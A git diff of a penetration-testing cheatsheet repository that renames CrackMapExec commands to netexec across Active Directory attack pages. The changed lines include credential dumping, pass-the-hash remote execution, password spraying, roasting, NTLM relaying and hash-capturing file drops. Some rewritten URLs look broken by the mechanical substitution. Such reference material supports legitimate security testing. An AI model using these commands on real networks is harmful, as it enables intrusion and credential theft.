Merge pull request #7 from mpgn/main

switch to nxc as cme is archived

docs/active-directory/CVE/MS14-068.md

@@ -22,7 +22,7 @@ This exploit require to know the user SID, you can use `rpcclient` to remotely g
   Convert-NameToSid high-sec-corp.localkrbtgt
   S-1-5-21-2941561648-383941485-1389968811-502
   ```
-* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid`  
+* netexec: `netexec ldap DC1.lab.local -u username -p password -k --get-sid`  
 
 ```bash
 Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068

docs/active-directory/CVE/NoPAC.md

@@ -10,12 +10,12 @@
 
 0. Check the MachineAccountQuota of the account
   ```powershell
-  crackmapexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ
+  netexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ
   StandIn.exe --object ms-DS-MachineAccountQuota=*
   ```
 1. Check if the DC is vulnerable
   ```powershell
-  crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac
+  netexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac
   ```
 
 **Exploitation**

docs/active-directory/CVE/PrintNightmare.md

@@ -48,7 +48,7 @@ When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the
 WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav:
 
 ```ps1
-cme smb -u user -p password -d domain.local -M webdav [TARGET]
+nxc smb -u user -p password -d domain.local -M webdav [TARGET]
 ```
 
 **Trigger the exploit**: 

docs/active-directory/CVE/ZeroLogon.md

@@ -75,9 +75,9 @@ Exploit steps from the white paper
   lsadump::postzerologon /target:10.10.10.10 /account:DC01$
   ```
 
-* `CrackMapExec` - only check
+* `netexec` - only check
   ```powershell
-  crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon
+  netexec smb 10.10.10.10 -u username -p password -d domain -M zerologon
   ```
 
 A 2nd approach to exploit zerologon is done by relaying authentication.

docs/active-directory/ad-adcs-certificate-services.md

@@ -5,7 +5,7 @@ Active Directory Certificate Services (AD CS) is a Microsoft Windows server role
 
 ## ADCS Enumeration
 
-* crackmapexec: `crackmapexec ldap domain.lab -u username -p password -M adcs`
+* netexec: `netexec ldap domain.lab -u username -p password -M adcs`
 * ldapsearch: `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
 * certutil: `certutil.exe -config - -ping`, `certutil -dump`
 

docs/active-directory/ad-adds-enumerate.md

@@ -282,9 +282,9 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun
 Sometimes you need to find a machine where a specific user is logged in.    
 You can remotely query every machines on the network to get a list of the users's sessions.
 
-* CrackMapExec
+* netexec
   ```ps1
-  cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions
+  nxc smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions
   SMB         10.10.10.10    445    WIN-8OJFTLMU1IG  [+] Enumerated sessions
   SMB         10.10.10.10    445    WIN-8OJFTLMU1IG  \\10.10.10.10            User:Administrator
   ```
@@ -320,7 +320,7 @@ You can remotely query every machines on the network to get a list of the users'
 ## References
 
 * [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)
-* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/)
+* [Pen Testing Active Directory Environments - Part I: Introduction to netexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-netexec-powerview/)
 * [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/)
 * [Pen Testing Active Directory Environments - Part III:  Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/)
 * [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/)

docs/active-directory/ad-adds-groups.md

@@ -9,7 +9,7 @@ If you do not want modified ACLs to be overwritten every hour, you should change
 Find users with `AdminCount=1`.
 
 ```ps1
-crackmapexec ldap 10.10.10.10 -u username -p password --admin-count
+netexec ldap 10.10.10.10 -u username -p password --admin-count
 # or
 bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get search --filter '(admincount=1)' --attr sAMAccountName
 # or

docs/active-directory/ad-adds-linux.md

@@ -99,8 +99,8 @@ On macOS you can use `bifrost`.
 Connect to the machine using the account and the hash with CME.
 
 ```powershell
-$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN"
-CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0  
+$ netexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN"
+         10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0  
 ```
 
 

docs/active-directory/ad-adds-ntds-dumping.md

@@ -27,8 +27,8 @@ DCSync is a technique used by attackers to obtain sensitive information, includi
   ```powershell
   mimikatz# lsadump::dcsync /domain:htb.local /all /csv
 
-  crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds
-  crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi
+  netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds
+  netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi
   ```
 
 > :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts.
@@ -48,9 +48,9 @@ The VSS is a Windows service that allows users to create snapshots or backups of
   ```powershell
   ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
   ```
-* [CrackMapExec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit)
+* [netexec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit)
   ```powershell
-  cme smb 10.10.0.202 -u username -p password --ntds vss
+  nxc smb 10.10.0.202 -u username -p password --ntds vss
   ```
 
 

docs/active-directory/ad-roasting-asrep.md

@@ -44,9 +44,9 @@
   root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
   ```
 
-* CrackMapExec Module
+* netexec Module
   ```powershell
-  $ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt
+  $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt
   LDAP        10.0.2.11       389    dc01           [email protected]:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5
   ```
 
@@ -106,7 +106,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-
   ```bash
   user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL
   user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache
-  user@hostname:~$ crackmapexec smb DC01.DOMAIN.LOCAL -k --shares
+  user@hostname:~$ netexec smb DC01.DOMAIN.LOCAL -k --shares
   ```
 
 **Mitigations**: 

docs/active-directory/ad-roasting-kerberoasting.md

@@ -18,9 +18,9 @@ Any valid domain user can request a kerberos ticket (ST) for any domain service.
   $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2
   ```
 
-* CrackMapExec Module
+* netexec Module
   ```powershell
-  $ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt
+  $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt
   LDAP        10.0.2.11       389    dc01           [*] Windows 10.0 Build 17763 x64 (name:dc01) (domain:lab.local) (signing:True) (SMBv1:False)
   LDAP        10.0.2.11       389    dc01           $krb5tgs$23$*john.doe$lab.local$MSSQLSvc/dc01.lab.local~1433*$efea32[...]49a5e82$b28fc61[...]f800f6dcd259ea1fca8f9
   ```

docs/active-directory/hash-pass-the-hash.md

@@ -14,9 +14,9 @@ The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since
   run
   shell
   ```
-* CrackMapExec
+* netexec
   ```powershell
-  cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
+  nxc smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
   ```
 * Impacket suite
   ```powershell

docs/active-directory/internal-mitm-relay.md

@@ -83,10 +83,10 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
     impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support
     impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support
 
-    # the socks proxy can then be used with your Impacket tools or CrackMapExec
+    # the socks proxy can then be used with your Impacket tools or netexec
     $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1
     $ proxychains impacket-mssqlclient DOMAIN/[email protected] -windows-auth
-    $ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1"   
+    $ proxychains netexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1"   
     ```
 
 **Mitigations**:
@@ -106,7 +106,7 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
 Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
 
 ```powershell
-crackmapexec smb $hosts --gen-relay-list relay.txt
+netexec smb $hosts --gen-relay-list relay.txt
 
 # DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6
 # -d is the domain name that we filter our request on - the attacked domain
@@ -239,7 +239,7 @@ secretsdump.py -k -no-pass target.lab.local
 * Discover WebDAV services
     ```ps1
     webclientservicescanner 'domain.local'/'user':'password'@'machine'
-    crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
+    netexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
     GetWebDAVStatus.exe 'machine'
     ```
 * Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. 

docs/active-directory/internal-shares.md

@@ -98,12 +98,12 @@ IconFile=\\10.10.10.10\Share\test.ico
 Command=ToggleDesktop
 ```
 
-Using [`crackmapexec`](https://github.com/mpgn/CrackMapExec/blob/master/cme/modules/slinky.py):
+Using [`netexec`](https://github.com/Pennyw0rth/NetExec/blob/master/cme/modules/slinky.py):
 
 ```ps1
-crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf
-crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk
-crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP
+netexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf
+netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk
+netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP
 ```
 
 ### URL Files

docs/active-directory/kerberos-delegation-unconstrained.md

@@ -41,9 +41,9 @@ Check the `TRUSTED_FOR_DELEGATION` property.
   grep TRUSTED_FOR_DELEGATION domain_computers.grep
   ```
 
-* [CrackMapExec module](https://github.com/mpgn/CrackMapExec/wiki) 
+* [netexec module](https://github.com/Pennyw0rth/NetExec/wiki) 
   ```powershell
-  cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation
+  nxc ldap 10.10.10.10 -u username -p password --trusted-for-delegation
   ```
 
 * BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c`

docs/active-directory/kerberos-tickets.md

@@ -25,7 +25,7 @@ There are two types of tickets in Kerberos:
 ## Replay Kerberos Tickets
 
 * Mimikatz: `mimikatz.exe "kerberos::ptc C:\temp\[email protected]"`
-* CrackMapExec: `KRB5CCNAME=/tmp/administrator.ccache crackmapexec smb 10.10.10 -u user --use-kcache`
+* netexec: `KRB5CCNAME=/tmp/administrator.ccache netexec smb 10.10.10 -u user --use-kcache`
 
 
 ## Convert Kerberos Tickets

docs/active-directory/pwd-comments.md

@@ -9,8 +9,8 @@ There are 3-4 fields that seem to be common in most Active Directory schemas: `U
 
 * Password in User Description
     ```powershell
-    crackmapexec ldap domain.lab -u 'username' -p 'password' -M user-desc
-    crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users
+    netexec ldap domain.lab -u 'username' -p 'password' -M user-desc
+    netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users
     GET-DESC... 10.0.2.11       389    dc01    [+] Found following users: 
     GET-DESC... 10.0.2.11       389    dc01    User: Guest description: Built-in account for guest access to the computer/domain
     GET-DESC... 10.0.2.11       389    dc01    User: krbtgt description: Key Distribution Center Service Account

docs/active-directory/pwd-group-policy-preferences.md

@@ -27,10 +27,10 @@ echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aS
     post/windows/gather/credentials/gpp
     ```
 
-* CrackMapExec modules
+* netexec modules
     ```powershell
-    cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin
-    cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password
+    nxc smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin
+    nxc smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password
     ```
 
 * [Get-GPPPassword](https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py)

docs/active-directory/pwd-read-gmsa.md

@@ -15,11 +15,11 @@
 
 ### Extract NT hash from the Active Directory
 
-* [mpgn/CrackMapExec](https://github.com/mpgn/CrackMapExec)
+* [netexec](https://github.com/Pennyw0rth/NetExec)
   ```ps1
   # Use --lsa to get GMSA ID
-  crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99
-  crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....'
+  netexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99
+  netexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....'
   ```
 
 * [CravateRouge/bloodyAD](https://github.com/CravateRouge/bloodyAD)

docs/active-directory/pwd-read-laps.md

@@ -61,9 +61,9 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
        ./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1
        ```
      
-   * [CrackMapExec](https://github.com/mpgn/CrackMapExec):
+   * [netexec](https://github.com/Pennyw0rth/NetExec):
        ```bash
-       crackmapexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps
+       netexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps
        ```
 
    * [LAPSDumper](https://github.com/n00py/LAPSDumper) 

docs/active-directory/pwd-spraying.md

@@ -38,9 +38,9 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
 
 ## Spray a pre-generated passwords list
 
-* Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
+* Using `netexec` and `mp64` to generate passwords and spray them against SMB services on the network.
   ```powershell
-  crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
+  netexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
   ```
 * Using `DomainPasswordSpray` to spray a password against all users of a domain.
   ```powershell
@@ -74,7 +74,7 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
 > The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown.
 
 ```powershell
-$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
+$ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
 LDAP        10.0.2.11       389    dc01       Guest      badpwdcount: 0 pwdLastSet: <never>
 LDAP        10.0.2.11       389    dc01       krbtgt     badpwdcount: 0 pwdLastSet: <never>
 ```

docs/active-directory/trust-relationship.md

@@ -24,9 +24,9 @@
   ----------          ----------                    ---------      --------------
   domainA.local      domainB.local                  TreeRoot       Bidirectional
   ```
-* Crackmapexec module `enum_trusts`
+* netexec module `enum_trusts`
   ```powershell
-  cme ldap <ip> -u <user> -p <pass> -M enum_trusts 
+  nxc ldap <ip> -u <user> -p <pass> -M enum_trusts 
   ```
 
 

docs/cheatsheets/miscellaneous-tricks.md

@@ -16,7 +16,7 @@ $ who
 $ write root pts/2	# press Ctrl+D  after typing the message. 
 ```
 
-## CrackMapExec Credential Database
+## netexec Credential Database
 
 ```ps1
 cmedb (default) > workspace create test

docs/redteam/access/windows-using-credentials.md

@@ -7,7 +7,7 @@
     * [Guest Credential](#guest-credential)
     * [Retail Credential](#retail-credential)
     * [Sandbox Credential](#sandbox-credential)
-* [Crackmapexec](#crackmapexec)
+* [netexec](#netexec)
 * [Impacket](#impacket)
     * [PSExec](#psexec)
     * [WMIExec](#wmiexec)
@@ -94,23 +94,23 @@ Username: wdagutilityaccount
 Password: pw123
 ```
 
-## Crackmapexec
+## netexec
 
-Using [mpgn/CrackMapExec](https://github.com/mpgn/CrackMapExec)
+Using [mpgn/netexec](https://github.com/Pennyw0rth/NetExec)
 
-* CrackMapExec supports many protocols
+* netexec supports many protocols
     ```powershell
-    crackmapexec ldap 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" 
-    crackmapexec mssql 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
-    crackmapexec rdp 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" 
-    crackmapexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
-    crackmapexec winrm 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
+    netexec ldap 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" 
+    netexec mssql 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
+    netexec rdp 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" 
+    netexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
+    netexec winrm 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
     ```
-* CrackMapExec works with password, NT hash and Kerberos authentication
+* netexec works with password, NT hash and Kerberos authentication
     ```powershell
-    crackmapexec smb 192.168.1.100 -u Administrator -p "Password123?" # Password
-    crackmapexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" # NT Hash
-    export KRB5CCNAME=/tmp/kerberos/admin.ccache; crackmapexec smb 192.168.1.100 -u admin --use-kcache # Kerberos
+    netexec smb 192.168.1.100 -u Administrator -p "Password123?" # Password
+    netexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" # NT Hash
+    export KRB5CCNAME=/tmp/kerberos/admin.ccache; netexec smb 192.168.1.100 -u admin --use-kcache # Kerberos
     ```
 
 
@@ -228,7 +228,7 @@ PS C:\> netsh firewall set service remoteadmin enable
 PS C:\> netsh firewall set service remotedesktop enable
 # Alternative
 C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
-root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
+root@payload$ netexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
 
 # Fix CredSSP errors
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

docs/redteam/escalation/windows-privilege-escalation.md

@@ -1446,7 +1446,7 @@ Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
 
 ### MS17-010 (Eternal Blue)
 
-Check the vulnerability with the following nmap script or crackmapexec: `crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`.
+Check the vulnerability with the following nmap script or netexec: `netexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`.
 
 ```c
 nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock>